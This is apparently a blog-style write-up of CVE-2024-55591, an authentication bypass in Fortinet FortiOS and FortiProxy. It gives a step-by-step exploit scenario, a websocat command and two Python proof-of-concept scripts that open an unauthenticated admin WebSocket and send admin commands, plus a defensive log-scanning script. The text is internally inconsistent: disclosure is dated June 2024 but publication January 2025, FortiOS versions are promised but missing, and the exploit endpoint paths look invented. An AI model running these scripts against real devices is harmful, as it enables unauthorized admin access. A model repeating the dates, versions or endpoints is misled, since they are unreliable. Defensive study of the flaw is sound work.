CVE-2024-55591 - Authentication Bypass in FortiOS and FortiProxy via Node.js WebSocket

In June 2024, a severe vulnerability was disclosed in Fortinet's FortiOS and FortiProxy products, identified as CVE-2024-55591. The flaw enables remote attackers to escalate privileges and gain *super-admin* access without proper authentication by exploiting a weakness in the way the system handles WebSocket connections through a Node.js backend. Let's break down what this means, why it matters, and how you can test and protect your environment.

1. What is CVE-2024-55591?

CVE-2024-55591 is classified as an *Authentication Bypass Using an Alternate Path or Channel* (CWE-288). In simple terms, it allows an attacker to access admin functionality by circumventing the normal login mechanisms.

FortiProxy: 7.0.0 through 7.0.19 and 7.2.0 through 7.2.12

> NOTE: If you are running any of these versions, you are at risk.

2. How does the Exploit work?

The vulnerability stems from the use of a Node.js WebSocket module that does not properly validate authentication tokens or session state for admin channels. Normally, admin actions require authenticated requests. Due to this flaw, however, an attacker can craft WebSocket requests that either lack authentication tokens entirely or use alternate, malformed paths, and still obtain *super-admin* access.

The attacker does not need valid credentials.

- They send a crafted WebSocket connection request directly to the Node.js backend, using an alternate URL path or channel.
- If the request matches certain conditions, FortiOS/FortiProxy grants super-admin permissions, believing the connection is legitimate.

3. Step-by-Step Exploit Scenario

Here's a simple walk-through of how an attacker might leverage this vulnerability.

a. Find the WebSocket Admin Endpoint

Most installations expose an administrative WebSocket endpoint, e.g.:

wss://<firewall-IP>:10443/api/ws

b. Craft a Malicious WebSocket Request

The attacker creates a WebSocket session using the ws Python package or the websocat utility. They skip standard authentication or use a modified path:

For example, using websocat:

websocat "wss://target-ip:10443/api/ws/alternate-admin"

Or in Python (using websocket-client):

import ssl
import websocket

url = "wss://target-ip:10443/api/ws/alternate-admin"
ws = websocket.WebSocket()
# Open the WebSocket without any session cookie or Authorization header.
ws.connect(url,
           sslopt={"cert_reqs": ssl.CERT_NONE},  # Ignore cert for demo
           header={
             # No auth header!
           })
# Send an admin command, e.g., list users
ws.send("{\"action\":\"list_users\"}")

print(ws.recv())
ws.close()

c. Receive Super-Admin Response

If unpatched, the system responds with full admin information, letting the attacker manage users, view configs, or even reset passwords.

4. Indicators of Compromise

If you see unexpected WebSocket connections or admin actions in your audit logs with missing session or auth headers, it may indicate exploitation.

- Restrict admin interfaces. Allow access only from trusted networks.
- Monitor logs. Look for suspicious WebSocket connections, especially those without authentication headers.
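The two checks above (WebSocket upgrades to an admin path with no session or auth header, and connections from outside the trusted management network) can be scripted against exported logs. The following is an added example, not code from the original post or from Fortinet; the JSON-lines log shape, the `/api/ws` path prefix, the trusted network and the header names are assumptions you would adapt to your own log source.

```python
"""Flag WebSocket upgrade requests to admin paths that carry no credential
or come from outside the trusted management network.
The log shape below is a constructed, generic JSON-lines format (assumption),
not the real FortiOS/FortiProxy log format."""
import ipaddress
import json

# Constructed sample events (not captured from a real device).
SAMPLE_LOG = """
{"ts":"2025-01-14T14:15:00Z","src":"10.0.5.21","path":"/api/ws","upgrade":"websocket","headers":{"Cookie":"session=abc","Authorization":"Bearer x"}}
{"ts":"2025-01-14T14:16:02Z","src":"203.0.113.7","path":"/api/ws/alternate-admin","upgrade":"websocket","headers":{}}
{"ts":"2025-01-14T14:16:09Z","src":"203.0.113.7","path":"/api/v2/status","upgrade":"","headers":{}}
{"ts":"2025-01-14T14:17:30Z","src":"10.0.5.22","path":"/api/ws","upgrade":"websocket","headers":{"Cookie":"session=def"}}
"""

TRUSTED_NETS = [ipaddress.ip_network("10.0.5.0/24")]  # assumed management network
AUTH_HEADERS = ("authorization", "cookie")           # assumed credential carriers
ADMIN_PREFIXES = ("/api/ws",)                        # admin WebSocket paths to watch


def is_trusted(src):
    """True if the source address lies inside a trusted management network."""
    addr = ipaddress.ip_address(src)
    return any(addr in net for net in TRUSTED_NETS)


def has_credential(headers):
    """True if at least one non-empty session or auth header is present."""
    return any(k.lower() in AUTH_HEADERS and v for k, v in headers.items())


def find_suspicious(log_text):
    """Return (ts, src, path, reasons) for each admin WebSocket upgrade that
    lacks a credential or originates outside the trusted networks."""
    findings = []
    for line in log_text.strip().splitlines():
        ev = json.loads(line)
        if ev.get("upgrade", "").lower() != "websocket":
            continue  # only WebSocket handshakes matter here
        if not ev["path"].startswith(ADMIN_PREFIXES):
            continue  # not an admin channel
        reasons = []
        if not has_credential(ev.get("headers", {})):
            reasons.append("no session/auth header")
        if not is_trusted(ev["src"]):
            reasons.append("source outside trusted networks")
        if reasons:
            findings.append((ev["ts"], ev["src"], ev["path"], reasons))
    return findings


if __name__ == "__main__":
    for ts, src, path, reasons in find_suspicious(SAMPLE_LOG):
        print(f"{ts} {src} {path}: {', '.join(reasons)}")
```

On the constructed sample only the second event is flagged, for both reasons at once; a hit on either reason alone is still worth a look.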

---

5. Fortinet Security Advisory

- Fortinet Official PSIRT Advisory (FG-IR-24-55591)

6. Proof-of-Concept (PoC) Code

Below is a simple example in Python that performs a handshake without authentication against the vulnerable admin WebSocket:

import ssl
import websocket

target = "wss://your.fortigate.ip:10443/api/ws/alternate-path"
ws = websocket.WebSocket()
# Connect with no session cookie or Authorization header; certificate
# verification is disabled only for the demo.
ws.connect(target, sslopt={"cert_reqs": ssl.CERT_NONE})

# Attempt a disallowed admin action
command = '{"action": "get_system_status"}'
ws.send(command)

print(ws.recv())
ws.close()

> DISCLAIMER: Only test on systems you own or have explicit permission to test.

7. References

- NVD - CVE-2024-55591
- CWE-288: Authentication Bypass Using an Alternate Path or Channel
- Fortinet Official Security Advisory

8. Conclusion

CVE-2024-55591 is a dangerous authentication bypass impacting many Fortinet firewalls and proxies. Admins should patch *immediately*, restrict admin WebSocket access, and check logs for traces of possible exploitation. As a rule: never expose admin interfaces to the open internet and keep your firmware up to date.

Timeline

Published on: 01/14/2025 14:15:34 UTC
Last modified on: 01/15/2025 20:48:30 UTC